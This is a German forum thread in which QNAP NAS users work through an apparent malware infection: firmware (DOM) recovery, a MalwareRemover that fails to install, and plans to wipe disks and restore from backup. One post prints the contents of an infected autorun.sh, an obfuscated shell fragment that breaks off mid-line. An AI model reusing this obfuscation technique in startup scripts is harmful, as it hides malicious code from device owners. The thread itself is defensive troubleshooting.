QNAP Dienste können sich nicht automatisch aktualisieren

  • Ich habe den gestrigen Abend und heutigen morgen mit der DOM Recovery verbracht. Anleitung hatte ich für mein TS-253A direkt die aus der wiki.qnap.com/wiki/Frimware_Recovery genommen.

    • zuerst Sicherungskopie kontrolliert (alles drauf) dann Platten raus
    • Ich hatte es erst mit den Linux Distributionen DSL, Ubuntu 15.5, LUbuntu versucht, alles vergebens, keine Zugriffsrechte oder der Lili USB Creator wollte nicht recht. Also die von qnap vorgeschlagene Clonezilla "clonezilla-live-2.4.2-10-amd64.iso" as your ISO file. (for other models)" Variante.
    • Linux läuft wie beschrieben (sieht nur etwas anders aus als auf den QNAP Screenshots, aber seis drum)
    • Befehlsreihenfolge abgearbeitet (auch von der Wiki-Seite)... passt
    • Reboot--> NAS aus-->Platten wieder rein
    • Boot --> 4x Tux zu sehen und decompressing Linux.booting kernel ..... passt auch
    • Login mit Standard-Login (Konsolen/ "DOS" Umgebung)
    • Stand jetzt der Lüfter fährt immer hoch und runter und ich sehe .... [~] #...... weiter geht es nicht, auch der QFinder findet
    • also nochmal das DOM File (F_TS-X53II_20151028-1.3.0_TDS-special) geladen, nochmal auf den USB Stick kopiert
    • Platten wieder raus
    • nochmal die Befehle abgearbeitet (auch gewartet bis der prompt wieder da war -->Kopiervorgang).
    • alles wieder wie oben beschrieben (Platten sind auch noch draussen)
    • stehe wieder an der Stelle: Stand jetzt der Lüfter fährt immer hoch und runter und ich sehe .... [~] #...... weiter geht es nicht, auch der QFinder findet nichts
    • Ich hatte vor einiger Zeit mal die RAM-Riegel ausgetauscht (von 4GB auf 16GB Kingston, zeittlich weit vor dem obigen Schlamassel) aber daran kann das doch nicht liegen, das er heir nicht weiter kommt oder? Die Wiki meint hier nur: "12. After the system has been recovered, the NAS should boot up correctly and can be found by QNAP Finder." --> hier stehe ich jetzt und weine wieder :(

    ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

    Naja, manchmal ist man aber auch dämlich........ LAN-Kabel war nicht eingesteckt.

    Der prompt ist i.O., mehr ist auf dem Monitor nicht zu sehen..... aber im Qfinder erscheint die TS mit einem OS 1.3.0... taufrisches OS aus dem Netz gezogen und mit dem Qfinder aufgespielt.... jetzt läufts.

    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

    Nächster Schritt blauer Bildschirm zum initialisieren, Meldung "Datenträger fehlt". Darunter steht: "Bitte beachten: Alle auf dem Datenträgern gespeicherten Daten werden bei der Initialisierung gelöscht"--> das will ich nicht.

    Gibt es eine Möglichkeit die Daten zu behalten und das Ding trotzdem zu initialisieren?

    Wäre es eine Möglichkeit nur eine Platte neu zu initialisieren (TS-253A lief als Mirror, also beide Platten haben den gleichen Inhalt) und mit der zweiten Platte dann die Daten wieder ins System zu bringen?

    Ich habe zwar eine Sicherung, habe bei sowas aber trotzdem immer ein mulmiges Gefühl.....

    2 Mal editiert, zuletzt von thx ()

  • zuerst Sicherungskopie kontrolliert (alles drauf) dann Platten raus

    Wenn du dein System komplett neu aufsetzen möchtest, würde ich probieren auf den Platten alle Partitionen zu löschen. Bzw. könnte man für einen weiteren Installationsversuch auch erst einmal mit einer Platte (mit geschrubbten Partitionen) arbeiten. Vielleicht ist das ein Versuch wert.

  • Ich bin jetzt mal mutig gewesen und habe eine der beiden Platten installiert und die Zweite als Backup gelassen. Nas Hochgefahren (QTS Version war die gleiche, die vorher auch drauf war)... und siehe da, plötzlich (nach seeeeehhhhr langer Wartezeit) erscheint die HD-Station auf dem Monitor. Ich habe mich ins QTS eingeloggt und alles ist noch da.


    Kleine Anekdote nebenbei: Der MalwareRemover ließ sich ja nicht installieren und war auch nicht bei den Apps zu finden, händisch hörte er bei 1% auf. Ich habe das NAS hochgefahren und sobald das login erschienen ist, eingeloggt, Apps händisch installieren, MalwareRemover und siehe da, es funktionierte....alerdings nur bis 45%, dann war Ende (dort war vermutlich die Malware geladen).


    Zurück zum Thema.. NAS wieder runter gefahren, zweite Platte eingeschoben und wieder hochgefahren (die IP Adresse im Qfinder wahr übrigens eine andere als die in der HD-Station angezeigte)... war alles auch nicht übers Webinterface erreichbar... habe alles auf einem am NAS angeschlossenen Bildschirm bewerkstelligt


    Wieder über die HD Station ins QTS eingeloggt und versucht den MalwareRemover zu installieren..... vergebens, ich denke mal der hat sich auch auf den Platten versteckt und gleich wieder installiert...... also bleibt nur der Hardcore-Weg.. Alle Daten nochmal sichern, DOM Recovery einspielen und dann alles platt machen.... was für ein Schei?......

  • Ich werde verrückt.

    Da ich das gleiche Problem habe, bedeutet das, dass mein Backup (der Daten) wertlos ist?

    Ich könnte alles platt machen, die Platten formatieren und die Daten aus dem Backup auf die Platten kopieren.

    Bevor ich dieses Projekt starte, frage ich mich, ob das zum Erfolg führen würde.

  • Das kann ich Dir bald sagen..... Ich will folgende Strategie fahren:

    1. Daten (Bilder, Dokumente, Videos etc.) werden gerade auf eine USB-Schatulle kopiert (rödelt bereits).
    2. Daten werden mit einem Windowsrechner mit einem Virenscanner (bei mir Jewgeni K.) untersucht.
    3. Platten werden im existenten NAS platt gemacht --> Partitionen gelöscht und nicht mehr hergestellt
      3.1. Ergänzung: Linux USB Stik am WinRechner platt machen und neu erstellen (falls der Schlingel auch hier versteckt ist)
    4. DOM Recovery NAS
    5. Platten rein NAS initialisieren
    6. Partitionen erstellen
    7. Alles installieren inkl. MalwareRemover
    8. USB-Schatulle an NAS mit sofortigem Scan durch MalWareRemover
    9. Daten rüberschaufeln
    10. Wenn das alles nichts hilft, habe ich nur noch eine Lösung, die hat mit viel Bier zu tun..........


    Falls der jenige der die Malware programmiert hat dieses mal lesen sollte (ehrer unwahrscheinlich) Respekt für die Cleverness von deinem Programm und ich wünsche dir die Diarrhö an den Hals...............


    Hatte ich noch vergessen, der Vollständigkeit halber, sämtliche Passwörter die mit dem NAS zu tun haben NAS Login, Plex, Netzlaufwerk-Scripte etc. werden natürlich geändert.

    2 Mal editiert, zuletzt von thx () aus folgendem Grund: Ergänzung

  • Ja du hast Recht, anbei nun der Screenshot (einmal gedoomt, aber immer noch mit den gleichen Problemen).

    Ich denke mal du wolltest nachschauen ob die autorun.sh aktiviert ist, leider nicht.


    WP_20190125_17_45_12_Pro.jpg

  • Du musst auch auf den Link klicken damit man einen evtl. Inhalt der autorun.sh sieht.


    Gruss

  • Ich Depperle. Hier der Inhalt meiner Autorin.sh:


    undefined


    Wie man sieht steht nichts drin. Ehrlich um diese Datei habe ich mich noch nie gekümmert.

    Im welchen Rolf Verzeichnis befindet sich diese Datei?

  • Bei mir ist die autorun.sh nicht aktiviert.


    Das steht in der autorun.sh:


    Bash
    #!/bin/sh
    tr${cVWIjcwJGoH}ue; ${vENDhqemu}$'\x74'${cmBuxm}${KzBRB}ype; tru${KNyUuHPREDAPl}e; tru${NkKph}${BOaMsPqmZnBm}e; test${VcJDNGfnPfktFT}; fals${WoGRRMDsRWoigSJ}${HvAB}e; uns${BIMSPQUhvV}e${hcROATKzEZI}t; ${UUwSm}ty${icwSe}${ZDiuzzhZek}pe; co${MfScRHIcb}${SmkC}mman${uEWVQt}d; fa${pFnLXuUAaLbz}ls${fzbAVt}e; f${JZCtVXdm}als${aSgmsNNaxSsNtBb}e${pLvjVwhykNaUPAG}; builti${EhfoXWcaXgRLeWe}n; $HqMFcYIiUZcttGw$""t${BRodCaZlbtKlHa}ype; f${SvvxxVgEA}al${IaeiEg}se; false${bNbDLI}; XHHiCh=t${mJUAWOEjrKa}${VIyNyr}r${ftstpCgTf}
  • Hallo EC,

    Hast du das selber mal reingeschrieben? Anders gefragt steht überhaubt standartmässig etwas drinn.

    Kannst du mal im groben beschreiben was das alles bedeutet was in deiner Autorun.sh steht.

    Danke


    PS: mein Inhalt in der autorun.sh undefined

    Frage wenn ich in Qnap unter Hardware die Datei aufrufe kann ich im Mittelfeld nichts lesen. Siehe Screenshot.

    Screenshot_2019-01-26-12-01-31.jpg

    3 Mal editiert, zuletzt von camping-heini () aus folgendem Grund: Zur besseren Verdeutlichung

  • Eckfahne: Beileid! Dein NAS ist definitiv infiziert.


    Aufräumen ist angesagt!


    In der Autorun.sh steht normalerweise nichts drin.


    Gruss

  • Alles klar.

    1. Wie werde ich den Eintrag wieder los?

    2. Warum hat das Zurücksetzen auf Werkseinstellungen mit Initiaiserung der Platten das nicht behoben?

    3. Es muss doch möglich sein, das NAS komplett in Auslieferungszustand zu versetzen um es dann neu aufzusetzen?

  • NAS neu aufsetzen!


    Auf alles andere würde ich mich nicht verlassen. Und vor allem auch alle anderen PCs checken!


    Gruss

  • Inkl. DOM Recovery?

    Oder schon wieder seit dem Neuaufsetzen infiziert?


    Gruss

  • Leider sagt mir DOM nichts.

    In welchem Verzeichnis finde ich die autorun.sh?

    Nachtrag:


    Ich habe gerade geelesen, dass ich da mit winscp nicht dran komme.

    Herzlichen Glückwunsch. :(